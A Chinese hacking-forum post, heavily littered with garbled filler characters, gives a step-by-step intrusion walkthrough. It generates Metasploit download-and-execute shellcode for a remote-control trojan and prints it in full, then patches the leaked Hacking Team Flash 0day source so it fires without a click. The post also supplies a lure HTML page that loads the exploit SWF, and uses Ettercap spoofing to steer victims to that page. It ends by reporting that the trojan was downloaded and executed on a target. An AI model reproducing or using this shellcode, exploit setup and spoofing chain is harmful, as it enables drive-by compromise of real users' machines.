|
$ h$ @/ a& T' u) V3 F
三、flash 0day之手工代码修改制作下载者实例入侵演示 9 U$ D* F0 c. B2 d* c
; F; T& n" @/ r+ W
5 _3 A$ N3 e& w* y3 \* n 利用到的工具: 0 c7 f, X4 d5 r, x
^2 E2 v. a; S! z1 g
/ {* h4 \, n: J9 A, b
Msf
1 }; s, e" p0 i
; n4 _4 f- f. c% v+ j; T; Y. e, @
' n/ K* p1 E+ [! q1 {3 C Ettercap $ Y1 A; _0 `: k1 [
5 f' b% B, R+ f/ {9 T$ Q
o [9 X9 a8 p5 U* R Adobe Flash CS6
$ a' W7 a8 {) W
5 D8 G8 y# q2 S1 b
/ z1 h- w. W. _) u Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ) r% l. p4 M8 r4 d
+ E) E/ i7 ^$ _. T0 H: X
3 b8 _% x0 ?- r5 t( F7 c
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
; E) H% E* l2 O& D! v3 v. S4 \
5 Q6 H" i7 J& f& q4 k
3 i: Q7 B! |# f1 R) `2 | 如图: : l" h6 I; e, H0 ]5 ] O
k0 h) G( \; ^' }% C) C0 F3 v) f# n* n1 x4 e
. L: s8 m c; z! ^
% v; [; U/ V3 O r) ]8 r1 W
% n2 c: U/ `! ?: a9 s H9 Y D
- N/ y1 M0 t! d1 X3 ^% F 9 p5 o8 @( Q2 H$ K0 Q V/ C
) Y2 c& y D9 I, y6 _% [" w+ K
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
; ^2 o2 W8 F) i1 P+ s7 G' J. S+ S ' p1 `; ^( l! I4 C$ v/ p1 x5 m2 G8 ~
% G R/ L* V7 o% l% b
5 s8 ]( T$ G4 o1 K
4 T! g; V5 g4 j4 [- w0 W ]
; `) w* ~) k2 A& F7 o- z  3 A. _+ ` h1 m- E
% V* K& N }9 V9 `. p
: l; ?3 F$ i4 S% f2 p 然后执行generate -t dword生成shellcode,如下: 6 {: @# L V, ]! }8 X# F
1 [' R7 B- V2 f; j) ^1 X& i- z# w. G( T% c& }; E3 s- T
' j0 _. A7 \0 S " c& l% t# f5 V6 z: e2 {8 D& n' l# Z2 k
0 `. s* d; @$ M6 T 复制代码到文本下便于我们一会编辑flash exp,如下:
* f ^) f0 e: Z! H9 L8 @# h, z Z 8 t. c" y7 `- D% B4 l
' I" W( E: m* ?8 U4 {) H. @ 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 7 Y" s9 r& I7 _
' f7 R. q' T& G. z# N ?( [; @
$ V9 c2 Y4 V: r7 B$ D8 c' M 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, $ n' {( U# E @, \3 ?( c' v
4 s' y3 C: a; y8 A' O& p8 ^4 h- |# U0 K- L( b3 M; [5 ^
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
/ Z3 n. H/ _8 ]4 D( G6 p) g' @
0 n$ v2 i2 n6 G4 A. d+ z: d7 N" n$ f$ f! W
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
6 [/ H0 m' w( U+ Y/ X: h5 X7 |
1 l; C! Q) H: u+ R# [6 e' D( \( ]% w2 m% U6 x) S
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
9 j, F7 D8 N& j0 H3 W
: I5 z% _, J- a( v J5 l+ {8 q* k8 V7 D
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
+ Z! u( J/ m% o2 W
+ A; A/ n* z/ s4 W- U
/ [1 ~4 r# G7 j3 T& \0 Q9 r 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 1 [$ S( G, ~8 e ^! ^
3 a( p& b1 ^2 V" h9 y
0 S4 o" F$ A- F4 L 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ; O/ u( ~% F* ^+ N! P! y
, O Q/ P/ D6 o( x! @7 W
% A( D/ o: Y) J 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
- H6 y) G+ z$ m. \1 G4 X* H 9 i6 b$ v* K7 I: B/ g' ]9 e* T4 ~
3 L7 Y: n u I+ C+ T& f 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
2 ]" H/ a3 } b( F6 I0 [4 |. W
7 t$ P: f* J% p, [) Y! Z& ~9 s: Q, j5 r
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
4 F+ C) S* H5 u4 L% q ! `; |& m4 m; `# D0 e- X/ Q5 w
t6 i$ c1 H7 ?; n, i) {
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
' U. `$ Z4 b3 d: }
# V: G& g- U7 R; h* _0 W; |- a5 ^- ]& t* T8 y
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
9 E6 X7 }7 o: i+ [' O0 X- z " C/ |) a. I! o. ^ J
5 J3 u w* ~5 S0 {; p 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 7 O+ }- f7 H5 R- n( u# r- v
9 a3 J: W4 h7 c: k: V
# S: W9 E' |$ k1 D: H
1 B- H V5 b! T* Q) }6 z
. L; V) U7 F! h% x" [% P% `( N0 f
$ S; n1 o/ y6 r! d
% B' L4 C$ I! L& _; W. F. b
) S- `" w: n% ~$ X5 n# Z 下面我们来修改flash 0day exp,需要修改三个文件,分别为: - {8 W- }* H( g' O
/ `8 A1 ], r; \! x
5 S. |4 f2 A; N* r
" t1 m- {# f! q l" [ ' V7 n0 \7 i+ d3 y6 @) N
& R9 S% W5 _, v2 E 先修改ShellWin32.as,部分源代码如图: & }) H9 e, e# [
" \; V' t% O3 U! E& d0 z9 E6 h* Y% @/ I3 M2 n
( G& G/ B5 G: G( |5 C& a, q % {6 s; N3 ]& q% ]9 ?
3 z8 W9 w* g4 ]0 U; B& j
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
! f6 L8 |/ Y" H* b6 M
: R3 M) V. v7 ]" H5 ~4 b9 }" ?& |
 * s$ r( O1 E3 u! Y0 n; M
7 e1 r9 {- V1 l& _
, C9 ]+ V. B/ I: L: |% E3 G
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
* v( R7 c5 ~+ t5 }) M$ X
9 r8 c: l+ J! |) j% Y0 x" ~1 d6 ?/ o3 u0 m- h% [6 r' K
 / E! _; ?1 A, ^' g
2 |$ U4 z% t* R3 _: C
$ x2 b+ E$ N4 ?2 R. W2 `( s0 s 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: . ^9 y* n9 {- x1 V* g
: Z9 q+ |* G4 n9 h$ O9 ]
; r9 u( J; N. A4 u
8 t- N; w" X! r2 B/ k
* L: A; a! G: c) H, r* }7 ]$ j+ B4 }! n2 y& `) B
- s3 k' ?3 p9 h( A3 E! G; `& n, R5 y, ^) W
5 ~2 g! g/ y m. e W( G9 o& Q( A
3 ? W+ j Q2 L5 C, R 
5 g. \& ?4 }8 Z7 C1 z
* d7 H! ^* _" J' k/ P0 E: E% S' X% E6 \* \6 y2 t2 F; ?
然后点保存,下面我们来编译一下,打开 H: W* R! ?- t; L# t
. ?, J8 k) c0 M8 C
! Z0 a4 o% o) d8 @& N
exp1.fla然后点文件-发布,看看编译没错误
1 z5 b; o! L' b) y, A+ z " p( F" w* f: M# {
+ J& H6 d1 C! Z+ l$ r' p) K/ |
, o5 P; H# ^3 g# t+ M
9 N! o' e! Y5 t0 t, ^+ n7 E, E9 O2 k- {# Y- m0 M
& {! K6 H6 ^9 e7 l! a 4 R& f& P/ s; O0 o, o" S
0 W4 t' ~* z2 r7 ^$ z( p
) T7 r6 l! y! i7 Q+ j3 w4 L * `( K+ {+ T5 b3 C. ?, F. h7 Z
6 q" Q1 c" y6 F* t# \+ w4 [
 1 U- T' ^, b+ `1 [
v# a/ B2 r* B+ B( t6 [( H+ u9 q0 X8 w& L, W! ]
然后我们把生成的 5 {! @4 f4 m. y
$ _3 B& j3 `. U9 r2 g' G' x: ^9 n* S( O. v) r
exp1.swf丢到kailinux 的/var/www/html下: $ H) Z1 K, _1 Q w1 H* I2 ]. [
! R* D+ v% y+ Y" y% `8 s% H" F
2 ^" e. q6 e+ Q$ F4 x
然后把这段代码好好编辑一下 ) v$ Z- T6 P+ t8 W9 G
* R7 |& |& s5 K3 _7 [
; i1 k2 I: o& G8 l( A
+ Y8 O( M! t2 ?6 \! t4 h$ q
% q6 p" W/ ^2 C& |! A* Z, X, q$ Q# \1 B8 h# X
7 e3 D1 l% F8 s; h
9 s& i1 u: c8 x" t
, ]& H/ {7 L2 W: s0 M. o % C8 f2 B1 U n, T- c( |3 ?1 m" a
+ ^% h9 k- ^0 F
8 R: m- f& t2 q; @, A S$ w
! s. z; n% e, ^) E1 i* P3 g * S( Z1 P; U1 b% z
Q1 h, {/ T. ] 3 }& a8 q( k9 V7 S! E5 W
# E0 g, d2 h& G
8 ?! q; ?) h1 ~0 k( Z" R z7 v8 F . F# x# c4 N# [) H7 v J
# a9 s2 \% V$ e1 E7 C e& g0 @
6 T& K* h3 E! K- q% G+ L <!DOCTYPE html> ( Q1 K3 q+ B+ O1 s3 ^- C% L/ u
# z/ I, |, f! r3 O( H% d
+ `8 T' m5 l2 M* { <html> * i5 z3 |3 c3 x) w
" m/ ], C" w6 l3 k, D
1 }$ c4 Z4 z1 H# M <head>
$ i# O2 Z! c* s8 G 1 X9 e6 o* c0 ]3 v* t9 J' {& C
* C' Q$ I. @2 j, z! b: q+ G <meta http-equiv="Content-Type" content="text/html; 2 g" ~6 q9 r! C5 W/ q
- O" b, T8 F' M6 k
^% A) H8 t! L4 X& j5 G/ h charset=utf-8"/> 0 ~' |: f$ f7 T
! x8 B K9 M# M3 Z/ r/ q: h0 Z |
6 Q$ T" N9 C0 y! o
</head> 4 v( y! O. \9 ^2 `
$ D7 I1 S+ t3 ^, V5 Z
3 O/ F7 j+ V5 O/ z1 Y( H. m
<body> 9 u1 i: T' D# e, K7 V2 V {
2 `( l! F6 M% C/ t9 @- k
" Q8 X( K9 v# N5 E1 `" @/ Q <h2> Please wait, the requested page is loading...</h2>
& O/ B0 M N4 t6 O: k
' S" p! O0 A8 c. r: M- ^& B
! Y' t# l" W" w4 j6 k& ^ <br>
h7 f' t( \8 @1 D3 O; P) a" r4 ? + G0 l } x2 X9 l
* D- f" C. k9 D2 c5 b7 b
<OBJECT
' H# r- d: O' g- ?, ]
/ X* U# X: b/ H2 ` g1 H! e: K9 c* `2 ], z( B6 p7 W7 I
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie - H8 c: M. m' ], o" @9 ~; m
( C9 Q- F& N/ p2 F, Z/ ~( j4 R* `
/ ]; F' T7 o- g# M# N0 E+ p% _ VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
* @6 U( g- x$ [# e7 D; Z8 x
. |* ?2 S" A8 P' y9 ` c, b
5 [7 M3 n7 N4 q% \) A/ C </body>
/ W3 M0 w5 S# F: q: x/ _ p. s z ; \# i$ L' E& L- R
8 m" W5 S* d% I4 w8 R4 ^ <script> 0 d! S! v2 `9 a# u7 A7 E. ]. o
( V9 G0 _; p9 k- l' ?- r
/ [* b% x. q) h: S- e setTimeout(function () {
0 I; e4 ~' ^- j q- M; f5 [ 3 y1 ?9 b8 A% u$ f
) t! z1 V( g" g$ U+ t+ e1 L2 o & b# }& O% t6 ^8 }4 ~& U9 N
) j0 ^0 N2 j- u+ w w5 O
9 l7 B6 k: i8 u5 }+ b9 G window.location.reload(); ( y: h2 @9 Z. ~ Q7 ]
; E a: x: C- z% G
+ z' g) w8 u* d* m }, 10000);
, Y0 u/ M8 H; F
, M1 H% Q B' G
* h5 i, x. Y v6 |7 M0 u
. g) }. R, b) f" V
4 f% x& M- U8 j+ U# {
& Z4 u- x. A0 w </script>
8 h7 T# n# I; L* Y 2 b9 V/ e/ C9 a
' J6 L! o4 k! j d3 [" T
</html>
! G% e/ D: k3 _
; H1 U& B- S. A5 u) U# p$ ?7 f5 }
" Q0 a# H$ O& Z# p0 f7 ]
0 ?( y- O5 n+ A( m1 f
( @ @# ^2 K G S 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: $ Q9 }$ u) I1 S* n) P1 R* b
% O# ]# \# O! w i- ^ v
# W8 E) q N) c B+ h- M$ j
2 |1 j; F+ p* [& g$ L4 J5 o* k4 S
4 d3 r* [8 K$ _: N( c/ U6 B0 v+ Q7 O
, N1 P5 A! m, i: c P2 d
, e/ v6 I8 ^9 ~, O! h9 L& L C: z4 }2 A: }" W; V1 k! F x0 u/ ^
9 y4 h4 E$ [( o+ ?1 @0 e) M9 f5 q- H
4 N' @: c& N2 {6 B- B, c
0 E7 }; U5 e" g7 @ 0 i5 q5 [9 O# Q6 u& U5 p
1 }2 y2 {% _8 B: \- M( h* Q( ~
. f# T2 `6 D8 H1 t# g1 l
$ F# k7 _/ J$ A) b% C
1 O: J. Z# p6 \) G, f) D( k5 v8 @+ a/ _7 z, N @$ y6 _
下面我们用ettercap欺骗如图:
. k( z# P. [8 |: v' V # T7 R' `: x! U9 c7 a, a+ ]
" ]0 S; y) l0 W. S1 Z4 T
8 Q h/ [+ Z Z ) c: \' e- p2 X9 }5 j) z
6 M0 \* i+ ]/ V' x$ d * P0 R3 a) X" F0 t
1 H" J$ h+ \, ^8 x
* t3 \* i* f5 u/ U, S 下面我们随便访问个网站看看:
) \; [3 E3 x- x9 N
! n: M& V- l/ A N$ h) B6 Y- {- R; }
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: $ X- K6 |) l2 v; }* M: e
# e- q+ O7 Y( P. {* N4 N b
% @7 Q0 ^3 P; p' Y s n
 " \- Y. a. R5 s' t3 i& h* m2 O/ \
8 f, d( F. I* `% a. R7 {! {' u2 |& n* P4 i% E
我们看另一台,
& t' |5 r4 d* y / I. V, K6 d# K7 h
' O+ l( Q5 C: L" f p$ R( L; @$ R6 p
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
3 L3 Y% z k( V1 L# M# e \ | 
发表于 2018-10-20 20:28:55
收藏
支持
反对